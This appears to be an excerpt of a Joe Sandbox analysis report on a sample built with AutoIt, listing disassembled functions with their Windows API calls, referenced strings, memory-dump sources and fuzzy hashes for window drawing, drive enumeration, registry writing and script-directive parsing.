Opcode Fuzzy Hash: d0a39c87a4a71e57ee4420c16f2a4e4966e3a3170123bd39f10bcfcbfb6d82e6
Instruction Fuzzy Hash: 5012AD30214202DFDB25CF14D88CBEAB7E5FB68305F14456AE4859B661DB31ECA2CF91

Function 00242711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0024273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0024286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 002428A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 002428B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00242900
GetClientRect.USER32(00000000,?), ref: 0024290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00242955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00242964
GetStockObject.GDI32(00000011), ref: 00242974
SelectObject.GDI32(00000000,00000000), ref: 00242978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00242988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00242991
DeleteDC.GDI32(00000000), ref: 0024299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 002429C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 002429DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00242A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00242A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 00242A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00242A77
GetStockObject.GDI32(00000011), ref: 00242A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00242A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00242A97

Strings

static, xrefs: 0024294F, 00242A71
AutoIt v3, xrefs: 002428F8
DISPLAY, xrefs: 0024295A
msctls_progress32, xrefs: 00242A13

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 55eda87a3d3ee4575f663b0988414d51d86a1c651b8ac54deee3baf8ff973efe
Instruction ID: 1ca27ecd4500dd09e538e0c73e3d55b23c96f5d735af5963bce76806aee0dae5
Opcode Fuzzy Hash: 55eda87a3d3ee4575f663b0988414d51d86a1c651b8ac54deee3baf8ff973efe
Instruction Fuzzy Hash: 27B17C71A10205AFEB14DFA9DC8AFAEBBB9EB18711F108159F914E7290D770ED10CB64

Function 00234ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00234AED
GetDriveTypeW.KERNEL32(?,0025CB68,?,\\.\,0025CC08), ref: 00234BCA
SetErrorMode.KERNEL32(00000000,0025CB68,?,\\.\,0025CC08), ref: 00234D36

Strings

ATAPI, xrefs: 00234C91
Unknown, xrefs: 00234BED, 00234C83
SSD, xrefs: 00234C4A
iSCSI, xrefs: 00234CC2
SAS, xrefs: 00234CC9
USB, xrefs: 00234CB4
SSA, xrefs: 00234CA6
Fixed, xrefs: 00234C09
Fibre, xrefs: 00234CAD
RAMDisk, xrefs: 00234BF4
SATA, xrefs: 00234CD0
MMC, xrefs: 00234CDE
\\.\, xrefs: 00234B3F
PhysicalDrive, xrefs: 00234B76
CDROM, xrefs: 00234BFB
Removable, xrefs: 00234C10, 00234C15
Network, xrefs: 00234C02
ATA, xrefs: 00234C98
Virtual, xrefs: 00234CE5
SCSI, xrefs: 00234C8A
FileBackedVirtual, xrefs: 00234CEC
1394, xrefs: 00234C9F
RAID, xrefs: 00234CBB

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: af5d12e1cc6c4454ed36ea30bbdeec83603484b85190e28c1ddee0cc5c4d6d6d
Instruction ID: d58994456781ed9ff86a72b92cbca423322425bc7fe5b5453a19a7d4131a0a4a
Opcode Fuzzy Hash: af5d12e1cc6c4454ed36ea30bbdeec83603484b85190e28c1ddee0cc5c4d6d6d
Instruction Fuzzy Hash: E361F7B46322069FCB04FF14C989E6CB7A1EB15304F249996F806AB292DB71FD71DB41

Function 002573E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00257421
SetTextColor.GDI32(?,?), ref: 00257425
GetSysColorBrush.USER32(0000000F), ref: 0025743B
GetSysColor.USER32(0000000F), ref: 00257446
CreateSolidBrush.GDI32(?), ref: 0025744B
GetSysColor.USER32(00000011), ref: 00257463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00257471
SelectObject.GDI32(?,00000000), ref: 00257482
SetBkColor.GDI32(?,00000000), ref: 0025748B
SelectObject.GDI32(?,?), ref: 00257498
InflateRect.USER32(?,000000FF,000000FF), ref: 002574B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002574CE
GetWindowLongW.USER32(00000000,000000F0), ref: 002574DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0025752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00257554
InflateRect.USER32(?,000000FD,000000FD), ref: 00257572
DrawFocusRect.USER32(?,?), ref: 0025757D
GetSysColor.USER32(00000011), ref: 0025758E
SetTextColor.GDI32(?,00000000), ref: 00257596
DrawTextW.USER32(?,002570F5,000000FF,?,00000000), ref: 002575A8
SelectObject.GDI32(?,?), ref: 002575BF
DeleteObject.GDI32(?), ref: 002575CA
SelectObject.GDI32(?,?), ref: 002575D0
DeleteObject.GDI32(?), ref: 002575D5
SetTextColor.GDI32(?,?), ref: 002575DB
SetBkColor.GDI32(?,?), ref: 002575E5

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 31f424d34d5d048d1d799edf44b97e286b6974f2a8b8239b3f135c9e3b40b04d
Instruction ID: de55d0db03a4de6e80633c0bb0192b9e8a2850a245a9894141573ae7ed40cd2b
Opcode Fuzzy Hash: 31f424d34d5d048d1d799edf44b97e286b6974f2a8b8239b3f135c9e3b40b04d
Instruction Fuzzy Hash: A3614F72900319AFDF019FA4EC49EAE7FB9EB08321F218115F915BB2A1E7749950CF94

Function 00250FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00251128
GetDesktopWindow.USER32 ref: 0025113D
GetWindowRect.USER32(00000000), ref: 00251144
GetWindowLongW.USER32(?,000000F0), ref: 00251199
DestroyWindow.USER32(?), ref: 002511B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 002511ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0025120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0025121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 00251232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00251245
IsWindowVisible.USER32(00000000), ref: 002512A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 002512BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 002512D0
GetWindowRect.USER32(00000000,?), ref: 002512E8
MonitorFromPoint.USER32(?,?,00000002), ref: 0025130E
GetMonitorInfoW.USER32(00000000,?), ref: 00251328
CopyRect.USER32(?,?), ref: 0025133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 002513AA

Strings

tooltips_class32, xrefs: 002511E6
(, xrefs: 0025131B
0, xrefs: 002510D3

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 1bc66c0f719b4b13bc1c32b27334f0a04aac87d899af705274a8910a9feb3771
Instruction ID: 99ff5808d4afa302e15d24ed23207fab60ca627d0cf48967778be3258651bce9
Opcode Fuzzy Hash: 1bc66c0f719b4b13bc1c32b27334f0a04aac87d899af705274a8910a9feb3771
Instruction Fuzzy Hash: 73B19971618341AFD700DF64D889F6ABBE4EF98311F00891CF9999B2A1D770EC68CB95

Function 001D8891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001D8968
GetSystemMetrics.USER32(00000007), ref: 001D8970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001D899B
GetSystemMetrics.USER32(00000008), ref: 001D89A3
GetSystemMetrics.USER32(00000004), ref: 001D89C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 001D89E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 001D89F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 001D8A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 001D8A3C
GetClientRect.USER32(00000000,000000FF), ref: 001D8A5A
GetStockObject.GDI32(00000011), ref: 001D8A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 001D8A81

Part of subcall function 001D912D: GetCursorPos.USER32(?), ref: 001D9141
Part of subcall function 001D912D: ScreenToClient.USER32(00000000,?), ref: 001D915E
Part of subcall function 001D912D: GetAsyncKeyState.USER32(00000001), ref: 001D9183
Part of subcall function 001D912D: GetAsyncKeyState.USER32(00000002), ref: 001D919D

SetTimer.USER32(00000000,00000000,00000028,001D90FC), ref: 001D8AA8

Strings

AutoIt v3 GUI, xrefs: 001D8A20

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: d1edaceeea914e2188cf3843fcfda8af625d5c58e45da37b90c901abe27abb4d
Instruction ID: 965ef9860bab12318e229a492fbe1fdddd3e5adb3de4587c881b4e26734fd788
Opcode Fuzzy Hash: d1edaceeea914e2188cf3843fcfda8af625d5c58e45da37b90c901abe27abb4d
Instruction Fuzzy Hash: 67B18C71A0030A9FDF14DFA8DC89BAE7BB5FB48315F11422AFA15A7290DB30E951CB54

Function 00220D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 002210F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00221114
Part of subcall function 002210F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00220B9B,?,?,?), ref: 00221120
Part of subcall function 002210F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00220B9B,?,?,?), ref: 0022112F
Part of subcall function 002210F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00220B9B,?,?,?), ref: 00221136
Part of subcall function 002210F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0022114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00220DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00220E29
GetLengthSid.ADVAPI32(?), ref: 00220E40
GetAce.ADVAPI32(?,00000000,?), ref: 00220E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00220E96
GetLengthSid.ADVAPI32(?), ref: 00220EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00220EB5
HeapAlloc.KERNEL32(00000000), ref: 00220EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00220EDD
CopySid.ADVAPI32(00000000), ref: 00220EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00220F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00220F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00220F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00220F6E
HeapFree.KERNEL32(00000000), ref: 00220F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00220F7E
HeapFree.KERNEL32(00000000), ref: 00220F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00220F8E
HeapFree.KERNEL32(00000000), ref: 00220F95
GetProcessHeap.KERNEL32(00000000,?), ref: 00220FA1
HeapFree.KERNEL32(00000000), ref: 00220FA8

Part of subcall function 00221193: GetProcessHeap.KERNEL32(00000008,00220BB1,?,00000000,?,00220BB1,?), ref: 002211A1
Part of subcall function 00221193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00220BB1,?), ref: 002211A8
Part of subcall function 00221193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00220BB1,?), ref: 002211B7

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: bf965709a6d2160759621d7815e805988ad5cd0774b3480d84f86de6f6bd2933
Instruction ID: ef0a21ed4d9b8d71386e5e6f6aca0d72f04bf724a1e28d344d5cc8d10359faba
Opcode Fuzzy Hash: bf965709a6d2160759621d7815e805988ad5cd0774b3480d84f86de6f6bd2933
Instruction Fuzzy Hash: 52716E7291031ABFDF209FA4ED88FAEBBB8FF04311F148125F919A6191DB309915CB60

Function 0024C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0024C4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,0025CC08,00000000,?,00000000,?,?), ref: 0024C544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0024C5A4
_wcslen.LIBCMT ref: 0024C5F4
_wcslen.LIBCMT ref: 0024C66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0024C6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0024C7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0024C84D
RegCloseKey.ADVAPI32(?), ref: 0024C881
RegCloseKey.ADVAPI32(00000000), ref: 0024C88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0024C960

Strings

REG_BINARY, xrefs: 0024C913
REG_EXPAND_SZ, xrefs: 0024C5CD
REG_DWORD, xrefs: 0024C804
REG_SZ, xrefs: 0024C644
REG_MULTI_SZ, xrefs: 0024C6F5
REG_QWORD, xrefs: 0024C8C3

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 4b83e175a520e2049d8ffaf5d124be31933d2831bb80d0ec68aee4fb70a26783
Instruction ID: 895f9d78c78a16c6d1b11519aecfc6c8bc9c3636d65d9f4af02d1f8e08928069
Opcode Fuzzy Hash: 4b83e175a520e2049d8ffaf5d124be31933d2831bb80d0ec68aee4fb70a26783
Instruction Fuzzy Hash: 7C1267356142019FC718DF18C881F2AB7E5EF98724F14889CF88A9B3A2DB31ED41CB85

Function 0025091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 002509C6
_wcslen.LIBCMT ref: 00250A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00250A54
_wcslen.LIBCMT ref: 00250A8A
_wcslen.LIBCMT ref: 00250B06
_wcslen.LIBCMT ref: 00250B81

Part of subcall function 001DF9F2: _wcslen.LIBCMT ref: 001DF9FD

Part of subcall function 00222BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00222BFA

Strings

GETITEMCOUNT, xrefs: 00250C1E
ISCHECKED, xrefs: 00250CE1
COLLAPSE, xrefs: 00250B01, 00250B1C
GETTOTALCOUNT, xrefs: 002509F2, 00250A17
CHECK, xrefs: 00250A85, 00250AA0
SELECT, xrefs: 00250D11
UNCHECK, xrefs: 00250D3E
GETTEXT, xrefs: 00250C97
EXPAND, xrefs: 00250BF8
GETSELECTED, xrefs: 00250C4E
EXISTS, xrefs: 00250B7C, 00250B97

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: b74c2d1e5e6a7a61b65d0d039589b5fc8403bc2487b599ba3fd906e5b4aa93d9
Instruction ID: 54571654002e26236ac7b21686f06748107bcd519a192056caa700acc6f3da35
Opcode Fuzzy Hash: b74c2d1e5e6a7a61b65d0d039589b5fc8403bc2487b599ba3fd906e5b4aa93d9
Instruction Fuzzy Hash: C5E1AF352283029FC714EF24C89092AB7E1FFA8319B14495DFC969B3A2D731ED59CB85

Function 0024C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0024B6AE,?,?), ref: 0024C9B5
_wcslen.LIBCMT ref: 0024C9F1
_wcslen.LIBCMT ref: 0024CA68
_wcslen.LIBCMT ref: 0024CA9E
_wcslen.LIBCMT ref: 0024CAF9
_wcslen.LIBCMT ref: 0024CB2F
_wcslen.LIBCMT ref: 0024CB7F

Strings

HKEY_CURRENT_USER, xrefs: 0024CBBD
HKEY_CLASSES_ROOT, xrefs: 0024CAF3, 0024CAF8
HKLM, xrefs: 0024CA98, 0024CA9D
HKCC, xrefs: 0024CBAC
HKCU, xrefs: 0024CBCE
HKCR, xrefs: 0024CB29, 0024CB2E
HKEY_CURRENT_CONFIG, xrefs: 0024CB79, 0024CB7E
HKEY_USERS, xrefs: 0024CBDF
HKEY_LOCAL_MACHINE, xrefs: 0024CA62, 0024CA67
HKU, xrefs: 0024CBF0

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 2e400f054f748fa74d2ae7258684d4ac6c50d2bf70e55cabe0f9b0d7f7527674
Instruction ID: 675dab077e347a30b85640cf3ac5ede147dfb98adaa1bb9df8850ef41f4efd83
Opcode Fuzzy Hash: 2e400f054f748fa74d2ae7258684d4ac6c50d2bf70e55cabe0f9b0d7f7527674
Instruction Fuzzy Hash: E771163363252B8BCB58DE7CC8515BE3395AF70758B340529F866AB284EB31CD65C7A0

Function 0025833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0025835A
_wcslen.LIBCMT ref: 0025836E
_wcslen.LIBCMT ref: 00258391
_wcslen.LIBCMT ref: 002583B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 002583F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,0025361A,?), ref: 0025844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00258487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 002584CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00258501
FreeLibrary.KERNEL32(?), ref: 0025850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0025851D
DestroyIcon.USER32(?), ref: 0025852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00258549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00258555

Strings

.dll, xrefs: 002583AB
.icl, xrefs: 00258368
.exe, xrefs: 00258388

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: ed9be1e1969181bdd8beb644c7238c31cc30e52cd6986c2ae400bf18e097056d
Instruction ID: 3d26d835b369fd0bb68d936f33420385f32e548c5f4c425c14300be220d7deef
Opcode Fuzzy Hash: ed9be1e1969181bdd8beb644c7238c31cc30e52cd6986c2ae400bf18e097056d
Instruction Fuzzy Hash: 4861FF71910306BEEB14DF64DC85BBE77A8BB18B22F104109FC15E60D1EBB4A964CBA4

Function 001C7778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

#comments-start, xrefs: 001C785F, 001C78B1
#comments-end, xrefs: 001C78D9
Bad directive syntax error, xrefs: 0020519A
#notrayicon, xrefs: 001C77E7
#pragma compile, xrefs: 001C77D3
Unterminated group of comments, xrefs: 0020528C
#include-once, xrefs: 001C782F
#ce, xrefs: 001C78ED
Cannot parse #include, xrefs: 00205279
", xrefs: 00205153
#include, xrefs: 001C7847
#OnAutoItStartRegister, xrefs: 001C7817
#requireadmin, xrefs: 001C77FF
', xrefs: 00205169
#cs, xrefs: 001C7873, 001C78C5

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
